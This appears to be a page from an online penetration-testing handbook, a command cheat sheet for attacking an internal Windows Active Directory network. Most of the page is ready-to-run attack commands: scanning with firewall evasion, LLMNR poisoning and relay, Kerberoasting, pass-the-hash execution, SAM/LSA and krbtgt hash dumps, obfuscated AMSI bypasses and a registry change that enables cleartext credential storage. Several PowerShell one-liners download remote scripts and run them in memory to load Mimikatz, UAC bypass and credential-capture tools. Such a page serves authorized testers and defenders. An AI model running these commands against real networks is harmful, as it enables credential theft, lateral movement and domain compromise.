Pentest Book
Search…
/home/six2dez/.pentest-book
Contribute/Donate
Recon
Public info gathering
Root domains
Subdomain Enum
Webs recon
Network Scanning
Host Scanning
Packet Scanning
Enumeration
Files
SSL/TLS
Ports
Web Attacks
Web Technologies
Cloud
Exploitation
Payloads
Reverse Shells
File transfer
Post Exploitation
Linux
Pivoting
Windows
Mobile
General
Android
iOS
Others
Burp Suite
Password cracking
VirtualBox
Code review
Pentesting Web checklist
Internal Pentest
Web fuzzers review
Recon suites review
Subdomain tools review
Random
Master assessment mindmaps
BugBounty
Exploiting
tools everywhere
Powered By GitBook
Internal Pentest

Scan

Host && Port Scanning

  • -n flag to decrease time avoiding DNS resoltion.
  • -f fragment packets as FW evasion, if no FW/IDS, remove it.
  • Also check FW evasion
1
# Ping discovery, Top 20, fragment packets, no DNS resolution
2
sudo nmap -v --top-ports 20 X.X.X.0/24 -f -n --open -oA
3
# Ping discovery, Top 200, fragment packets, no DNS resolution, service version
4
sudo nmap -v --top-ports 200 X.X.X.0/24 -f -n -sV --open -oA
5
# Top 1000, fragment packets, no DNS resolution, service version, all alive (no ping)
6
sudo nmap -v --top-ports 1000 X.X.X.0/24 -f -n -sV -Pn --open -oA
Copied!

Web detection

1
# httpx
2
cat ip.txt | httpx -silent -random-agent -status-code -timeout 15 -title -web-server -tech-detect -o httpx.txt
3
cat ip.txt | httpx -silent -ports <UNCOMMON.PORTS> -random-agent -status-code -timeout 15 -title -web-server -tech-detect -o httpx_uncommon.txt
Copied!

Enum

Check AD section too

AD no credentials

1
# Detect SMB on network
2
responder-RunFinger -i X.X.X.0/24
3
4
# Find DC
5
nslookup -q=srv _ldap._tcp.dc._msdcs.<domain.name>
6
nslookup -type=srv _ldap._tcp.<domain.name> | grep ldap | cut -d ' ' -f 6 | sed 's/\.$//g'
7
8
# Enumerate DC
9
ldapsearch -h <DC.IP> -x -s base namingcontexts
10
11
# Check for null session, if got users go for ASREPRoast with GetNPUsers
12
ldapsearch -h <DC.IP> -x -b "DC=XX,DC=XX"
13
14
# Get hashes with no krb preauth
15
GetNPUsers.py [Domain Name]/ -dc-ip [Domain Controller IP address] -request
16
GetNPUsers.py 'DC.LOCAL/' -usersfile users.txt -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.10.10
17
18
# Get domain name
19
crackmapexec smb 10.10.10.10
20
smbmap -H 10.10.10.10 -u '' -p ''
21
22
# Get Users List
23
GetADUsers.py DC.local/ -dc-ip 10.10.10.10 -debug
24
25
# Get Users from ldap
26
windapsearch -U — full — dc-ip 10.10.10.10
27
28
# Get base domain
29
ldapsearch -x -h 10.10.10.175 -s base namingcontexts
30
31
# Get more info from DC
32
ldapsearch -x -h 10.10.10.10 -b ‘DC=DCNAME,DC=LOCAL’
Copied!

AD with credentials

  • Enum AD AIO
1
# https://github.com/CasperGN/ActiveDirectoryEnumeration
2
python3 -m ade --dc <domain.name> -u <[email protected]> --help
3
# https://github.com/adrecon/ADRecon from Windows on Domain
4
Copied!
  • windapsearch
1
# https://github.com/ropnop/go-windapsearch
2
windapsearch -d <domain>.<name> -u <user> -p <password> --help
Copied!
  • ldap
1
# Domain users
2
ldapsearch -LLL -x -H ldap://<DC.IP> -D "<USER>@<DOMAIN.NAME>" -w '<PASSWORD>' -b dc=<DOMAIN NAME>,dc=<DOMAIN NAME> -o ldif-wrap=no "(&(objectClass=user)(objectCategory=person))" name sAMAccountName userPrincipalName memberOf primaryGroupID adminCount userAccountControl description servicePrincipalName objectSid pwdLastSet lastLogon -E pr=1000/noprompt | tee domain_users.txt
3
4
# Domain computers
5
ldapsearch -LLL -x -H ldap://<DC.IP> -D "<USER>@<DOMAIN.NAME>" -w '<PASSWORD>' -b dc=<DOMAIN NAME>,dc=<DOMAIN NAME> -o ldif-wrap=no "(objectClass=computer)" name dNSHostname memberOf operatingSystem operatingSystemVersion lastLogonTimestamp servicePrincipalName description userAccountControl | tee domain_computers.txt
6
7
# Domain groups
8
ldapsearch -LLL -x -H ldap://<DC.IP> -D "<USER>@<DOMAIN.NAME>" -w '<PASSWORD>' -b dc=<DOMAIN NAME>,dc=<DOMAIN NAME> -o ldif-wrap=no "(objectClass=group)" name sAMAccountName memberOf member description objectSid | tee domain_groups.txt
Copied!
  • rpcclient
1
rpcclient -U "DOMAIN/username%password" <domaincontroller name or IP>" -c dsr_enumtrustdom
2
rpcclient -U "DOMAIN/username%password" <domaincontroller name or IP>" -c enumdomains
3
rpcclient -U "DOMAIN/username%password" <domaincontroller name or IP>" -c enumdomusers
4
rpcclient -U "DOMAIN/username%password" <domaincontroller name or IP>" -c enumdomgroups
5
rpcclient -U "DOMAIN/username%password" <domaincontroller name or IP>" -c getdompwinfo
Copied!
  • cme
1
# Run commands
2
3
# PS
4
cme smb <IP> -u <USER> -p '<PASS>' -X 'Get-Host'
5
# CMD
6
cme smb <IP> -u <USER> -p '<PASS>' -x whoami
7
# PTH
8
cme smb <IP> -u <USER> -H <NTHASH> -x whoami
9
# Other methods
10
cme smb <IP> -u <USER> -p '<PASS>' --exec-method {mmcexec,smbexec,atexec,wmiexec}
11
12
# Dumps
13
14
# SAM
15
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --sam
16
# LSASS
17
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --lsa
18
# Sessions
19
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --sessions
20
# Logged users
21
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --loggedon-users
22
# Disks
23
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --disks
24
# Users
25
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --users #Enumerate users
26
# Groups
27
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --groups
28
# Local groups
29
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --local-groups
30
# Password policy
31
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --pass-pol
Copied!

Attacks

LLMNR & NBT-NS Poisoning (Responder)

  • Find a privileged user creds to reuse in other host
  • Set to Off SMB and HTTP in /usr/share/responder/Responder.conf
1
responder -I ppp0 -A # Only listen
2
responder -I ppp0 -rv exec bash # Poison
Copied!
  • MultiRealy reuses hashes captured in specific host while responder is running
1
MultiRelay.py -t X.X.X.X -u ALL
Copied!

Kerberos

1
# Kerberoasting (hashcat 13100)
2
GetUserSPNs.py -request -save -dc-ip <IP> domain/user # hashcat 13100
3
4
# BF
5
kerbrute.py -d <DC.LOCAL> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
6
7
# ASREPRoast (hashcat 18200)
8
GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
9
10
# PTH/PTK
11
# Request ticket
12
getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
13
getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
14
getTGT.py <domain_name>/<user_name>:[password]
15
# Set ticket
16
export KRB5CCNAME=<TGT_ccache_file>
17
# Use it
18
psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
19
psexec.py -hashes 'hash' -dc-ip 10.10.10.10 [email protected]
20
smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
21
wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
Copied!

Dumps

1
# User hash
2
secretsdump.py '<DC.NAME>/<User>@<DC.IP>' -just-dc-user user1
3
4
# krbtgt hash dump -> Golden Ticket
5
secretsdump.py '<DC.NAME>/<User>@<DC.IP>' -just-dc-user krbtgt
Copied!

AMSI Bypass

1
# Basic
2
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
3
4
# Obfuscation
5
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
6
7
# Other bypass
8
[Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType('System.Reflection.Bindin'+'gFlags')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType('System.T'+'ype')), [Object]([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')),('GetFie'+'ld')).Invoke('amsiInitFailed',(('Non'+'Public,Static') -as [String].Assembly.GetType('System.Reflection.Bindin'+'gFlags'))).SetValue($null,$True)
Copied!

Common Exploits

PrivEsc

Local Privilege Escalation

1
# Juicy Potato - Abuse SeImpersonate or SeAssignPrimaryToken Privileges for System Impersonation
2
# Works only until Windows Server 2016 and Windows 10 until patch 1803
3
https://github.com/ohpe/juicy-potato
4
https://github.com/TsukiCTF/Lovely-Potato
5
6
# PrintSpoofer Exploit the PrinterBug for System Impersonation
7
# Works for Windows Server 2019 and Windows 10
8
https://github.com/itm4n/PrintSpoofer
9
10
# RoguePotato from Service Account to System
11
# Works for Windows Server 2019 and Windows 10
12
https://github.com/antonioCoco/RoguePotato
13
14
# Abusing Token Privileges
15
# https://foxglovesecurity.com/2017/08/25/abusing-token-privileges-for-windows-local-privilege-escalation/
16
17
# SMBGhost CVE-2020–0796
18
https://github.com/danigargu/CVE-2020-0796
19
20
# CVE-2021–36934 (HiveNightmare/SeriousSAM)
21
https://github.com/cube0x0/CVE-2021-36934
Copied!

Extra

Oneliners

1
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
2
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
3
4
# Invoke-Mimikatz: Dump credentials from memory
5
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
6
7
# Import Mimikatz Module to run further commands
8
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"
9
10
# Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)]
11
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"
12
13
# PowerUp: Privilege escalation checks
14
powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1’);Invoke-AllChecks”
15
16
# Invoke-Inveigh and log output to file
17
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y –Proxy Y -LogOutput Y -FileOutput Y"
18
19
# Invoke-Kerberoast and provide Hashcat compatible hashes
20
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"
21
22
# Invoke-ShareFinder and print output to file
23
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
24
25
# Import PowerView Module to run further commands
26
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"
27
28
# Invoke-Bloodhound
29
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
30
31
# Find GPP Passwords in SYSVOL
32
findstr /S cpassword $env:logonserver\sysvol*.xml findstr /S cpassword %logonserver%\sysvol*.xml (cmd.exe)
33
34
# Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]
35
runas /user:DOMAIN\USER /noprofile powershell.exe
36
37
# Insert reg key to enable Wdigest on newer versions of Windows (restart needed)
38
reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1
Copied!

Native commands

1
# User Domain
2
$env:USERDNSDOMAIN
3
(Get-ADDomain).DNSRoot
4
5
# User Domain info
6
Get-ADUser Anakin
7
8
# Computer Domain
9
(Get-WmiObject Win32_ComputerSystem).Domain
10
11
# DNS, NetBIOSName, DomainSID
12
Get-ADDomain | select DNSRoot,NetBIOSName,DomainSID
13
14
# Trusted domains
15
nltest /domain_trusts
16
17
# Forest info
18
Get-ADForest
19
20
# Interesting users
21
Get-ADUser -Filter * | select SamAccountName
22
23
# Computer accounts
24
Get-ADObject -LDAPFilter "objectClass=User" -Properties SamAccountName | select SamAccountName
25
26
# Trust accounts
27
Get-ADUser -LDAPFilter "(SamAccountName=*$)" | select SamAccountName
28
29
# Groups
30
Get-ADGroup -Filter * | select SamAccountName
31
32
# Interesting groups
33
Get-ADGroup "Domain Admins" -Properties members,memberof
34
35
# Get DC names
36
nltest /dclist:<domain.name>
37
38
# Get all users in the current domain
39
Get-NetUser | select -ExpandProperty cn
40
41
# Get all computers in the current domain
42
Get-NetComputer
43
44
# Get all domains in current forest
45
Get-NetForestDomain
46
47
# Get domain/forest trusts
48
Get-NetDomainTrust
49
Get-NetForestTrust
50
51
# Get information for the DA group
52
Get-NetGroup -GroupName "Domain Admins"
53
54
# Find members of the DA group
55
Get-NetGroupMember -GroupName "Domain Admins" | select -ExpandProperty membername
56
57
# Find interesting shares in the domain, ignore default shares
58
Invoke-ShareFinder -ExcludeStandard -ExcludePrint -ExcludeIPC
59
60
# Get OUs for current domain
61
Get-NetOU -FullData
62
63
# Get computers in an OU
64
# %{} is a looping statement
65
Get-NetOU -OUName StudentMachines | %{Get-NetComputer -ADSPath $_}
66
67
# Get GPOs applied to a specific OU
68
Get-NetOU *student* | select gplink
69
Get-NetGPO -Name "{3E04167E-C2B6-4A9A-8FB7-C811158DC97C}"
70
71
# Get Restricted Groups set via GPOs, look for interesting group memberships forced via domain
72
Get-NetGPOGroup
73
74
# Get incoming ACL for a specific object
75
Get-ObjectACL -SamAccountName "Domain Admins" -ResolveGUIDs | Select IdentityReference,ActiveDirectoryRights
76
77
# Find interesting ACLs for the entire domain, show in a readable (left-to-right) format
78
Find-InterestingDomainAcl | select identityreferencename,activedirectoryrights,acetype,objectdn | ?{$_.IdentityReferenceName -NotContains "DnsAdmins"} | ft
79
80
# Get interesting outgoing ACLs for a specific user or group
81
# ?{} is a filter statement
82
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReference -match "Domain Admins"} | select ObjectDN,ActiveDirectoryRights
83
84
# Get Applocker Policy
85
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
86
87
# Get computers running LAPS, along with their passwords if we're allowed to read those
88
Get-LAPSComputers
89
90
# Get groups allowed to read LAPS passwords
91
Find-LAPSDelegatedGroups
Copied!
Others - Previous
Pentesting Web checklist
Next - Others
Web fuzzers review
Last modified 9mo ago
Export as PDF
Copy link
Edit on GitHub
Contents
Scan
Host && Port Scanning
Web detection
Enum
AD no credentials
AD with credentials
Attacks
LLMNR & NBT-NS Poisoning (Responder)
Kerberos
Dumps
AMSI Bypass
Common Exploits
PrivEsc
Local Privilege Escalation
Extra
Oneliners
Native commands